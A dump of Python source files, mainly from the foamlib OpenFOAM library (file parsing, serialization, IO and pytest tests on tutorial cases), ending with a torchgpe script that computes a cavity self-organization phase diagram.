return b"(" + b" ".join(dumps(v, kind=Kind.SINGLE_ENTRY) for v in data) + b")"
if data is True:
return b"yes"
if data is False:
return b"no"
return str(data).encode("latin-1")
| 3,341 | Python | .py | 97 | 25.402062 | 86 | 0.546216 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,149 | _io.py | gerlero_foamlib/foamlib/_files/_io.py | import gzip
import sys
from copy import deepcopy
from pathlib import Path
from types import TracebackType
from typing import (
TYPE_CHECKING,
Optional,
Tuple,
Type,
Union,
)
if sys.version_info >= (3, 11):
from typing import Self
else:
from typing_extensions import Self
from ._parsing import Parsed
if TYPE_CHECKING:
import os
class FoamFileIO:
def __init__(self, path: Union["os.PathLike[str]", str]) -> None:
self.path = Path(path).absolute()
self.__contents: Optional[bytes] = None
self.__parsed: Optional[Parsed] = None
self.__defer_io = 0
self.__dirty = False
def __enter__(self) -> Self:
if self.__defer_io == 0:
self._read(missing_ok=True)
self.__defer_io += 1
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> None:
self.__defer_io -= 1
if self.__defer_io == 0 and self.__dirty:
assert self.__contents is not None
self._write(self.__contents)
def _read(self, *, missing_ok: bool = False) -> Tuple[bytes, Parsed]:
if not self.__defer_io:
try:
contents = self.path.read_bytes()
except FileNotFoundError:
contents = None
else:
assert isinstance(contents, bytes)
if self.path.suffix == ".gz":
contents = gzip.decompress(contents)
if contents != self.__contents:
self.__contents = contents
self.__parsed = None
if self.__contents is None:
if missing_ok:
return b"", Parsed(b"")
raise FileNotFoundError(self.path)
if self.__parsed is None:
parsed = Parsed(self.__contents)
self.__parsed = parsed
return self.__contents, deepcopy(self.__parsed)
def _write(self, contents: bytes) -> None:
self.__contents = contents
self.__parsed = None
if not self.__defer_io:
if self.path.suffix == ".gz":
contents = gzip.compress(contents)
self.path.write_bytes(contents)
self.__dirty = False
else:
self.__dirty = True
def __repr__(self) -> str:
return f"{type(self).__qualname__}('{self.path}')"
| 2,467 | Python | .py | 74 | 24.391892 | 73 | 0.562053 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,150 | _base.py | gerlero_foamlib/foamlib/_files/_base.py | import sys
from dataclasses import dataclass
from typing import TYPE_CHECKING, Dict, NamedTuple, Optional, Tuple, Union
if TYPE_CHECKING:
import numpy as np
if sys.version_info >= (3, 9):
from collections.abc import Mapping, Sequence
else:
from typing import Mapping, Sequence
class FoamFileBase:
class DimensionSet(NamedTuple):
mass: Union[int, float] = 0
length: Union[int, float] = 0
time: Union[int, float] = 0
temperature: Union[int, float] = 0
moles: Union[int, float] = 0
current: Union[int, float] = 0
luminous_intensity: Union[int, float] = 0
def __repr__(self) -> str:
return f"{type(self).__qualname__}({', '.join(f'{n}={v}' for n, v in zip(self._fields, self) if v != 0)})"
@dataclass
class Dimensioned:
value: Union[int, float, Sequence[Union[int, float]]] = 0
dimensions: Union["FoamFileBase.DimensionSet", Sequence[Union[int, float]]] = ()
name: Optional[str] = None
def __post_init__(self) -> None:
if not isinstance(self.dimensions, FoamFileBase.DimensionSet):
self.dimensions = FoamFileBase.DimensionSet(*self.dimensions)
Data = Union[
str,
int,
float,
bool,
Dimensioned,
DimensionSet,
Sequence["Data"],
Mapping[str, "Data"],
]
"""
A value that can be stored in an OpenFOAM file.
"""
_Dict = Dict[str, Union["Data", "_Dict"]]
_File = Dict[Optional[str], Union["Data", "_Dict"]]
_SetData = Union[
str,
int,
float,
bool,
Dimensioned,
DimensionSet,
Sequence["_SetData"],
Mapping[str, "_SetData"],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
]
| 1,920 | Python | .py | 56 | 26.892857 | 118 | 0.59493 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,151 | test_flange_async.py | gerlero_foamlib/tests/test_cases/test_flange_async.py | import os
import sys
from pathlib import Path
if sys.version_info >= (3, 9):
from collections.abc import AsyncGenerator
else:
from typing import AsyncGenerator
import pytest
import pytest_asyncio
from foamlib import AsyncFoamCase, AsyncSlurmFoamCase, CalledProcessError
@pytest_asyncio.fixture(params=[AsyncFoamCase, AsyncSlurmFoamCase])
async def flange(request: pytest.FixtureRequest) -> AsyncGenerator[AsyncFoamCase, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "basic" / "laplacianFoam" / "flange"
of11_path = tutorials_path / "legacy" / "basic" / "laplacianFoam" / "flange"
case = request.param(path if path.exists() else of11_path)
assert isinstance(case, AsyncFoamCase)
async with case.clone() as clone:
yield clone
@pytest.mark.asyncio
@pytest.mark.parametrize("parallel", [True, False])
async def test_run(flange: AsyncFoamCase, parallel: bool) -> None:
if parallel:
if not (flange.path / "Allrun-parallel").exists():
pytest.skip()
with flange.decompose_par_dict as d:
assert d["method"] == "scotch"
d["numberOfSubdomains"] = 2
if isinstance(flange, AsyncSlurmFoamCase):
await flange.run(parallel=parallel, fallback=True)
else:
await flange.run(parallel=parallel)
if parallel:
await flange.reconstruct_par()
await flange.clean()
if isinstance(flange, AsyncSlurmFoamCase):
await flange.run(parallel=parallel, fallback=True)
else:
await flange.run(parallel=parallel)
@pytest.mark.asyncio
async def test_run_cmd(flange: AsyncFoamCase) -> None:
if not flange:
await flange.restore_0_dir()
ans_path = (
Path(os.environ["FOAM_TUTORIALS"]) / "resources" / "geometry" / "flange.ans"
)
if not ans_path.exists():
ans_path = Path("flange.ans")
await flange.run(
[
"ansysToFoam",
ans_path,
"-scale",
"0.001",
],
cpus=0,
)
if isinstance(flange, AsyncSlurmFoamCase):
await flange.run([flange.application], fallback=True)
else:
await flange.run([flange.application])
@pytest.mark.asyncio
async def test_run_cmd_shell(flange: AsyncFoamCase) -> None:
if not flange:
await flange.restore_0_dir()
try:
await flange.run(
'ansysToFoam "$FOAM_TUTORIALS/resources/geometry/flange.ans" -scale 0.001',
cpus=0,
)
except CalledProcessError:
await flange.run('ansysToFoam "flange.ans" -scale 0.001', cpus=0)
if isinstance(flange, AsyncSlurmFoamCase):
await flange.run(flange.application, fallback=True)
else:
await flange.run(flange.application)
def test_path(flange: AsyncFoamCase) -> None:
assert Path(flange) == flange.path
| 2,869 | Python | .py | 78 | 30.358974 | 88 | 0.675939 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,152 | test_cavity_async.py | gerlero_foamlib/tests/test_cases/test_cavity_async.py | import os
import stat
import sys
from pathlib import Path
from typing import Sequence
if sys.version_info >= (3, 9):
from collections.abc import AsyncGenerator
else:
from typing import AsyncGenerator
import pytest
import pytest_asyncio
from foamlib import AsyncFoamCase
@pytest_asyncio.fixture(params=[False, True])
async def cavity(request: pytest.FixtureRequest) -> AsyncGenerator[AsyncFoamCase, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "incompressible" / "icoFoam" / "cavity" / "cavity"
of11_path = tutorials_path / "incompressibleFluid" / "cavity"
case = AsyncFoamCase(path if path.exists() else of11_path)
async with case.clone() as clone:
if request.param:
run = clone.path / "run"
assert not run.exists()
assert not (clone.path / "Allrun").exists()
run.write_text(
"#!/usr/bin/env python3\nfrom pathlib import Path\nfrom foamlib import FoamCase\nFoamCase(Path(__file__).parent).run(parallel=False)"
)
run.chmod(run.stat().st_mode | stat.S_IEXEC)
clean = clone.path / "clean"
assert not clean.exists()
assert not (clone.path / "Allclean").exists()
clean.write_text(
"#!/usr/bin/env python3\nfrom pathlib import Path\nfrom foamlib import FoamCase\nFoamCase(Path(__file__).parent).clean()"
)
clean.chmod(clean.stat().st_mode | stat.S_IEXEC)
yield clone
@pytest.mark.asyncio
async def test_run(cavity: AsyncFoamCase) -> None:
await cavity.run(parallel=False)
await cavity.clean()
await cavity.run(parallel=False)
assert len(cavity) > 0
internal = cavity[-1]["U"].internal_field
assert isinstance(internal, Sequence)
assert len(internal) == 400
@pytest.mark.asyncio
async def test_double_clean(cavity: AsyncFoamCase) -> None:
await cavity.clean()
await cavity.clean(check=True)
await cavity.run(parallel=False)
@pytest.mark.asyncio
async def test_cell_centers(cavity: AsyncFoamCase) -> None:
await cavity.block_mesh()
C = await cavity[0].cell_centers()
assert isinstance(C.internal_field, list)
assert len(C.internal_field) == 400
def test_map(cavity: AsyncFoamCase) -> None:
async def f(x: Sequence[float]) -> float:
async with cavity.clone() as clone:
clone[0]["U"].boundary_field["movingWall"].value = [x[0], 0, 0]
await clone.run(parallel=False)
U = clone[-1]["U"].boundary_field["movingWall"].value
assert not isinstance(U, (int, float))
assert len(U) == 3
ret = U[0]
assert isinstance(ret, (int, float))
return ret
assert AsyncFoamCase.map(f, [[1], [2]]) == [1, 2]
assert AsyncFoamCase.map(f, [[3]]) == [3]
| 2,866 | Python | .py | 68 | 35.132353 | 149 | 0.6548 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,153 | test_flange.py | gerlero_foamlib/tests/test_cases/test_flange.py | import os
import sys
from pathlib import Path
if sys.version_info >= (3, 9):
from collections.abc import Generator
else:
from typing import Generator
import pytest
from foamlib import CalledProcessError, FoamCase
@pytest.fixture
def flange() -> Generator[FoamCase, None, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "basic" / "laplacianFoam" / "flange"
of11_path = tutorials_path / "legacy" / "basic" / "laplacianFoam" / "flange"
case = FoamCase(path if path.exists() else of11_path)
with case.clone() as clone:
yield clone
@pytest.mark.parametrize("parallel", [True, False])
def test_run(flange: FoamCase, parallel: bool) -> None:
if parallel:
if not (flange.path / "Allrun-parallel").exists():
pytest.skip()
with flange.decompose_par_dict as d:
assert d["method"] == "scotch"
d["numberOfSubdomains"] = 2
flange.run(parallel=parallel)
if parallel:
flange.reconstruct_par()
flange.clean()
flange.run(parallel=parallel)
def test_run_cmd(flange: FoamCase) -> None:
if not flange:
flange.restore_0_dir()
ans_path = (
Path(os.environ["FOAM_TUTORIALS"]) / "resources" / "geometry" / "flange.ans"
)
if not ans_path.exists():
ans_path = Path("flange.ans")
flange.run(
[
"ansysToFoam",
ans_path,
"-scale",
"0.001",
],
)
flange.run([flange.application])
def test_run_cmd_shell(flange: FoamCase) -> None:
if not flange:
flange.restore_0_dir()
try:
flange.run(
'ansysToFoam "$FOAM_TUTORIALS/resources/geometry/flange.ans" -scale 0.001'
)
except CalledProcessError:
flange.run('ansysToFoam "flange.ans" -scale 0.001')
flange.run(flange.application)
def test_path(flange: FoamCase) -> None:
assert Path(flange) == flange.path
| 1,966 | Python | .py | 59 | 26.983051 | 86 | 0.64036 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,154 | test_cavity.py | gerlero_foamlib/tests/test_cases/test_cavity.py | import os
import stat
import sys
from pathlib import Path
from typing import Sequence
if sys.version_info >= (3, 9):
from collections.abc import Generator
else:
from typing import Generator
import pytest
from foamlib import FoamCase
@pytest.fixture(params=[False, True])
def cavity(request: pytest.FixtureRequest) -> Generator[FoamCase, None, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "incompressible" / "icoFoam" / "cavity" / "cavity"
of11_path = tutorials_path / "incompressibleFluid" / "cavity"
case = FoamCase(path if path.exists() else of11_path)
with case.clone() as clone:
if request.param:
run = clone.path / "run"
assert not run.exists()
assert not (clone.path / "Allrun").exists()
run.write_text(
"#!/usr/bin/env python3\nfrom pathlib import Path\nfrom foamlib import FoamCase\nFoamCase(Path(__file__).parent).run(parallel=False)"
)
run.chmod(run.stat().st_mode | stat.S_IEXEC)
clean = clone.path / "clean"
assert not clean.exists()
assert not (clone.path / "Allclean").exists()
clean.write_text(
"#!/usr/bin/env python3\nfrom pathlib import Path\nfrom foamlib import FoamCase\nFoamCase(Path(__file__).parent).clean()"
)
clean.chmod(clean.stat().st_mode | stat.S_IEXEC)
yield clone
def test_run(cavity: FoamCase) -> None:
cavity.run(parallel=False)
cavity.clean()
cavity.run(parallel=False)
assert len(cavity) > 0
internal = cavity[-1]["U"].internal_field
assert isinstance(internal, Sequence)
assert len(internal) == 400
def test_double_clean(cavity: FoamCase) -> None:
cavity.clean()
cavity.clean(check=True)
cavity.run(parallel=False)
def test_cell_centers(cavity: FoamCase) -> None:
cavity.block_mesh()
C = cavity[0].cell_centers()
assert isinstance(C.internal_field, list)
assert len(C.internal_field) == 400
| 2,055 | Python | .py | 51 | 33.607843 | 149 | 0.661809 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,155 | test_dumpb.py | gerlero_foamlib/tests/test_files/test_dumpb.py | from foamlib import FoamFile
from foamlib._files._serialization import Kind, dumps
def test_serialize_data() -> None:
assert dumps(1) == b"1"
assert dumps(1.0) == b"1.0"
assert dumps(1.0e-3) == b"0.001"
assert dumps(True) == b"yes"
assert dumps(False) == b"no"
assert dumps("word") == b"word"
assert dumps(("word", "word")) == b"word word"
assert dumps('"a string"') == b'"a string"'
assert dumps(1, kind=Kind.FIELD) == b"uniform 1"
assert dumps(1.0, kind=Kind.FIELD) == b"uniform 1.0"
assert dumps(1.0e-3, kind=Kind.FIELD) == b"uniform 0.001"
assert dumps([1.0, 2.0, 3.0]) == b"(1.0 2.0 3.0)"
assert dumps([1, 2, 3], kind=Kind.FIELD) == b"uniform (1 2 3)"
assert (
dumps([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], kind=Kind.FIELD)
== b"nonuniform List<scalar> 10(1 2 3 4 5 6 7 8 9 10)"
)
assert (
dumps([[1, 2, 3], [4, 5, 6]], kind=Kind.FIELD)
== b"nonuniform List<vector> 2((1 2 3) (4 5 6))"
)
assert dumps(1, kind=Kind.BINARY_FIELD) == b"uniform 1"
assert dumps(1.0, kind=Kind.BINARY_FIELD) == b"uniform 1.0"
assert dumps([1, 2, 3], kind=Kind.BINARY_FIELD) == b"uniform (1 2 3)"
assert (
dumps([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], kind=Kind.BINARY_FIELD)
== b'nonuniform List<scalar> 10(\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x08@\x00\x00\x00\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x14@\x00\x00\x00\x00\x00\x00\x18@\x00\x00\x00\x00\x00\x00\x1c@\x00\x00\x00\x00\x00\x00 @\x00\x00\x00\x00\x00\x00"@\x00\x00\x00\x00\x00\x00$@)'
)
assert (
dumps([[1, 2, 3], [4, 5, 6]], kind=Kind.BINARY_FIELD)
== b"nonuniform List<vector> 2(\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x08@\x00\x00\x00\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x14@\x00\x00\x00\x00\x00\x00\x18@)"
)
assert (
dumps(FoamFile.DimensionSet(mass=1, length=1, time=-2)) == b"[1 1 -2 0 0 0 0]"
)
assert (
dumps(
FoamFile.Dimensioned(
name="g",
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2),
value=9.81,
)
)
== b"g [1 1 -2 0 0 0 0] 9.81"
)
assert (
dumps(
FoamFile.Dimensioned(
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2), value=9.81
)
)
== b"[1 1 -2 0 0 0 0] 9.81"
)
assert (
dumps(("hex", [0, 1, 2, 3, 4, 5, 6, 7], [1, 1, 1], "simpleGrading", [1, 1, 1]))
== b"hex (0 1 2 3 4 5 6 7) (1 1 1) simpleGrading (1 1 1)"
)
assert dumps([{"a": "b"}, {"c": "d"}]) == b"(a b; c d;)"
assert dumps([{"a": {"b": "c"}}, {"d": {"e": "g"}}]) == b"(a {b c;} d {e g;})"
assert dumps([{"a": [0, 1, 2]}, {"b": {}}]) == b"(a (0 1 2); b {})"
assert dumps(["water", "oil", "mercury", "air"]) == b"(water oil mercury air)"
assert dumps("div(phi,U)") == b"div(phi,U)"
| 3,000 | Python | .py | 65 | 39.030769 | 323 | 0.543812 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,156 | test_files.py | gerlero_foamlib/tests/test_files/test_files.py | import os
import sys
from pathlib import Path
if sys.version_info >= (3, 9):
from collections.abc import Generator, Sequence
else:
from typing import Generator, Sequence
import numpy as np
import pytest
from foamlib import FoamCase, FoamFieldFile, FoamFile
def test_write_read(tmp_path: Path) -> None:
path = tmp_path / "testDict"
d = FoamFile(path)
assert d.path == path
with pytest.raises(FileNotFoundError):
d["key"]
with d, pytest.raises(FileNotFoundError):
d["key"]
d[None] = "touch"
assert len(d) == 1
assert d[None] == "touch"
assert list(d) == [None]
del d[None]
assert not d
assert len(d) == 0
assert list(d) == []
with pytest.raises(KeyError):
d["key"]
d["key"] = "value"
assert d["key"] == "value"
assert len(d) == 1
assert "key" in d
assert list(d) == ["key"]
assert "FoamFile" in d
del d["key"]
assert not d
assert "key" not in d
with pytest.raises(KeyError):
del d["key"]
assert d.version == 2.0
assert d.format == "ascii"
assert d.class_ == "dictionary"
assert d.location == f'"{d.path.parent.name}"'
assert d.object_ == d.path.name
d["subdict"] = {"key": "value"}
sd = d["subdict"]
assert isinstance(sd, FoamFile.SubDict)
assert sd["key"] == "value"
assert len(sd) == 1
assert list(sd) == ["key"]
d["subdict2"] = d["subdict"]
sd2 = d["subdict2"]
assert isinstance(sd2, FoamFile.SubDict)
assert sd2["key"] == "value"
assert len(sd) == 1
assert list(sd) == ["key"]
sd["subsubdict"] = d["subdict"]
ssd = sd["subsubdict"]
assert isinstance(ssd, FoamFile.SubDict)
assert ssd["key"] == "value"
sd["list"] = [1, 2, 3]
assert sd["list"] == [1, 2, 3]
sd["nestedList"] = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
assert sd["nestedList"] == [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
sd["g"] = FoamFile.Dimensioned(
name="g", dimensions=[1, 1, -2, 0, 0, 0, 0], value=[0, 0, -9.81]
)
assert sd["g"] == FoamFile.Dimensioned(
name="g",
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2),
value=[0, 0, -9.81],
)
with d:
lst = d["subdict", "list"]
assert isinstance(lst, list)
lst[0] = 0
assert lst == [0, 2, 3]
assert d["subdict", "list"] == [1, 2, 3]
def test_new_field(tmp_path: Path) -> None:
Path(tmp_path / "testField").touch()
f = FoamFieldFile(tmp_path / "testField")
f.internal_field = [1, 2, 3]
assert f.internal_field == [1, 2, 3]
assert f.class_ == "volVectorField"
@pytest.fixture
def cavity() -> Generator[FoamCase, None, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "incompressible" / "icoFoam" / "cavity" / "cavity"
of11_path = tutorials_path / "incompressibleFluid" / "cavity"
case = FoamCase(path if path.exists() else of11_path)
with case.clone() as clone:
yield clone
def test_dimensions(cavity: FoamCase) -> None:
assert cavity[0]["p"].dimensions == FoamFile.DimensionSet(length=2, time=-2)
assert cavity[0]["U"].dimensions == FoamFile.DimensionSet(length=1, time=-1)
cavity[0]["p"].dimensions = FoamFile.DimensionSet(mass=1, length=1, time=-2)
assert cavity[0]["p"].dimensions == FoamFile.DimensionSet(mass=1, length=1, time=-2)
def test_boundary_field(cavity: FoamCase) -> None:
moving_wall = cavity[0]["p"].boundary_field["movingWall"]
assert isinstance(moving_wall, FoamFieldFile.BoundarySubDict)
assert moving_wall.type == "zeroGradient"
assert "value" not in moving_wall
moving_wall.type = "fixedValue"
moving_wall.value = 0
assert moving_wall.type == "fixedValue"
assert moving_wall.value == 0
def test_mesh(cavity: FoamCase) -> None:
cavity.run(parallel=False)
file = cavity.file("constant/polyMesh/points")
assert None in file
assert None in list(file)
points = file[None]
assert isinstance(points, Sequence)
assert isinstance(points[0], Sequence)
assert len(points[0]) == 3
def test_internal_field(cavity: FoamCase) -> None:
blocks = cavity.block_mesh_dict["blocks"]
assert isinstance(blocks, list)
sizes = blocks[2]
assert isinstance(sizes, list)
size = np.prod(sizes)
p_arr = np.zeros(size)
U_arr = np.zeros((size, 3))
cavity[0]["p"].internal_field = p_arr
cavity[0]["U"].internal_field = U_arr
assert cavity[0]["p"].internal_field == pytest.approx(p_arr)
U = cavity[0]["U"].internal_field
assert isinstance(U, Sequence)
for u, u_arr in zip(U, U_arr):
assert u == pytest.approx(u_arr)
p_arr = np.arange(size) * 1e-6
U_arr = np.full((size, 3), [-1e-6, 1e-6, 0]) * np.arange(size)[:, np.newaxis]
cavity[0]["p"].internal_field = p_arr
cavity[0]["U"].internal_field = U_arr
assert cavity[0]["p"].internal_field == pytest.approx(p_arr)
U = cavity[0]["U"].internal_field
assert isinstance(U, Sequence)
for u, u_arr in zip(U, U_arr):
assert u == pytest.approx(u_arr)
cavity.run(parallel=False)
def test_fv_schemes(cavity: FoamCase) -> None:
div_schemes = cavity.fv_schemes["divSchemes"]
assert isinstance(div_schemes, FoamFile.SubDict)
scheme = div_schemes["div(phi,U)"]
assert isinstance(scheme, tuple)
assert len(scheme) >= 2
assert scheme[0] == "Gauss"
def test_binary_field(cavity: FoamCase) -> None:
cavity.control_dict["writeFormat"] = "binary"
cavity.run(parallel=False)
p_bin = cavity[-1]["p"].internal_field
assert isinstance(p_bin, Sequence)
U_bin = cavity[-1]["U"].internal_field
assert isinstance(U_bin, Sequence)
assert isinstance(U_bin[0], Sequence)
assert len(U_bin[0]) == 3
size = len(p_bin)
assert len(U_bin) == size
cavity.clean()
p_arr = np.arange(size) * 1e-6
U_arr = np.full((size, 3), [-1e-6, 1e-6, 0]) * np.arange(size)[:, np.newaxis]
cavity[0]["p"].internal_field = p_arr
cavity[0]["U"].internal_field = U_arr
assert cavity[0]["p"].internal_field == pytest.approx(p_arr)
U = cavity[0]["U"].internal_field
assert isinstance(U, Sequence)
for u, u_arr in zip(U, U_arr):
assert u == pytest.approx(u_arr)
cavity.run(parallel=False)
def test_compressed_field(cavity: FoamCase) -> None:
cavity.control_dict["writeCompression"] = True
cavity.run(parallel=False)
p_bin = cavity[-1]["p"].internal_field
assert isinstance(p_bin, Sequence)
U_bin = cavity[-1]["U"].internal_field
assert isinstance(U_bin, Sequence)
assert isinstance(U_bin[0], Sequence)
assert len(U_bin[0]) == 3
size = len(p_bin)
assert len(U_bin) == size
cavity.clean()
p_arr = np.arange(size) * 1e-6
U_arr = np.full((size, 3), [-1e-6, 1e-6, 0]) * np.arange(size)[:, np.newaxis]
cavity[0]["p"].internal_field = p_arr
cavity[0]["U"].internal_field = U_arr
assert cavity[0]["p"].internal_field == pytest.approx(p_arr)
U = cavity[0]["U"].internal_field
assert isinstance(U, Sequence)
for u, u_arr in zip(U, U_arr):
assert u == pytest.approx(u_arr)
cavity.run(parallel=False)
| 7,232 | Python | .py | 191 | 32.544503 | 88 | 0.631164 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,157 | test_parsing.py | gerlero_foamlib/tests/test_files/test_parsing.py | from foamlib import FoamFile
from foamlib._files._parsing import Parsed
def test_parse_value() -> None:
assert Parsed(b"1")[()] == 1
assert Parsed(b"1.0")[()] == 1.0
assert Parsed(b"1.0e-3")[()] == 1.0e-3
assert Parsed(b"yes")[()] is True
assert Parsed(b"no")[()] is False
assert Parsed(b"word")[()] == "word"
assert Parsed(b"word word")[()] == ("word", "word")
assert Parsed(b'"a string"')[()] == '"a string"'
assert Parsed(b"uniform 1")[()] == 1
assert Parsed(b"uniform 1.0")[()] == 1.0
assert Parsed(b"uniform 1.0e-3")[()] == 1.0e-3
assert Parsed(b"(1.0 2.0 3.0)")[()] == [1.0, 2.0, 3.0]
assert Parsed(b"uniform (1 2 3)")[()] == [1, 2, 3]
assert Parsed(b"nonuniform List<scalar> 2(1 2)")[()] == [1, 2]
assert Parsed(b"nonuniform List<scalar> 2{1}")[()] == [1, 1]
assert Parsed(b"3(1 2 3)")[()] == [1, 2, 3]
assert Parsed(b"2((1 2 3) (4 5 6))")[()] == [
[1, 2, 3],
[4, 5, 6],
]
assert Parsed(b"2{(1 2 3)}")[()] == [
[1, 2, 3],
[1, 2, 3],
]
assert Parsed(b"nonuniform List<vector> 2((1 2 3) (4 5 6))")[()] == [
[1, 2, 3],
[4, 5, 6],
]
assert Parsed(b"nonuniform List<vector> 2{(1 2 3)}")[()] == [
[1, 2, 3],
[1, 2, 3],
]
assert Parsed(
b"nonuniform List<scalar> 2(\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\x00@)"
)[()] == [1, 2]
assert Parsed(
b"nonuniform List<vector> 2(\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x08@\x00\x00\x00\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x14@\x00\x00\x00\x00\x00\x00\x18@)"
)[()] == [[1, 2, 3], [4, 5, 6]]
assert Parsed(b"[1 1 -2 0 0 0 0]")[()] == FoamFile.DimensionSet(
mass=1, length=1, time=-2
)
assert Parsed(b"g [1 1 -2 0 0 0 0] (0 0 -9.81)")[()] == FoamFile.Dimensioned(
name="g",
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2),
value=[0, 0, -9.81],
)
assert Parsed(b"[1 1 -2 0 0 0 0] 9.81")[()] == FoamFile.Dimensioned(
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2), value=9.81
)
assert Parsed(b"hex (0 1 2 3 4 5 6 7) (1 1 1) simpleGrading (1 1 1)")[()] == (
"hex",
[0, 1, 2, 3, 4, 5, 6, 7],
[1, 1, 1],
"simpleGrading",
[1, 1, 1],
)
assert Parsed(b"(a b; c d;)")[()] == [{"a": "b"}, {"c": "d"}]
assert Parsed(b"(a {b c;} d {e g;})")[()] == [
{"a": {"b": "c"}},
{"d": {"e": "g"}},
]
assert Parsed(b"(a (0 1 2); b {})")[()] == [{"a": [0, 1, 2]}, {"b": {}}]
assert Parsed(b"(water oil mercury air)")[()] == ["water", "oil", "mercury", "air"]
assert Parsed(b"div(phi,U)")[()] == "div(phi,U)"
assert Parsed(b"((air and water) { type constant; sigma 0.07; })")[()] == [
{"(air and water)": {"type": "constant", "sigma": 0.07}}
]
assert Parsed(b"[]")[()] == FoamFile.DimensionSet()
assert Parsed(b"object f.1;")["object"] == "f.1"
| 3,016 | Python | .py | 72 | 35.75 | 212 | 0.50068 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,158 | blue_self_organization_imaginary_time.py | qo-eth_TorchGPE/examples/blue_self_organization/imaginary_time/blue_self_organization_imaginary_time.py | from datetime import datetime
from torchgpe.bec2D import Gas
from torchgpe.bec2D.callbacks import CavityMonitor
from torchgpe.bec2D.potentials import Contact, DispersiveCavity, Trap
from torchgpe.utils.potentials import linear_ramp
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar
from tqdm.auto import tqdm
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
detunings = torch.linspace(*config["boundaries"]["cavity_detuning"])
depths = torch.linspace(*config["boundaries"]["lattice_depth"])
alphas = torch.tensor(np.empty((detunings.shape[0], depths.shape[0]), dtype=complex))
for d_idx, detuning in enumerate(tqdm(detunings, smoothing=0, desc = "Phase diagram", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]')):
for p_idx, pump in enumerate(tqdm(depths, smoothing=0, desc = "Row", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]', leave=False)):
cavity = DispersiveCavity(lattice_depth=pump, cavity_detuning=detuning, **config["potentials"]["cavity"])
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact, cavity], callbacks=[], **config["propagation"]["imaginary_time"])
alphas[d_idx, p_idx] = cavity.get_alpha(bec.psi)
def pi_tick_formatter(val, pos):
if val == 0: return 0
if (val/np.pi*4) % 4 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*4)==1 else int(val/np.pi*4)}\\pi / 4$"
def plot_pd(x,y,z):
fig, ax = plt.subplots(1, 2, figsize=(8, 3))
ax = ax.flatten()
im0 = ax[0].pcolormesh(x, y/1e6, np.log10(np.abs(z)), shading='auto', cmap="viridis")
ax[0].set_xlabel(r"$V_i$ [$E_r$]")
ax[0].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax = ax[0], orientation='vertical', label="$\\log|\\alpha|$")
x_left, x_right = ax[0].get_xlim()
y_low, y_high = ax[0].get_ylim()
ax[0].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
